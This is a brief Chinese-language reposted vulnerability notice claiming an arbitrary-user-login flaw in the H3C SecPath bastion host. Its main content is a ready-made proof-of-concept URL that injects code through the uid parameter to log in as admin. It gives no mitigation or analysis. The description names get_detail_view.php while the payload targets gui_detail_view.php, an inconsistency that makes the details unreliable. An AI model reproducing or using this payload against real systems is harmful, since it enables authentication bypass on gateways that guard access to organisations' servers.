漏洞描述:
H3C SecParh堡壘機 get_detail_view.php 存在任意用戶登錄漏洞
與齊治堡壘機出現的漏洞相似
漏洞復現:
POC:
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin


轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/398601.html
標籤:其他
上一篇:計算機網路名詞解釋
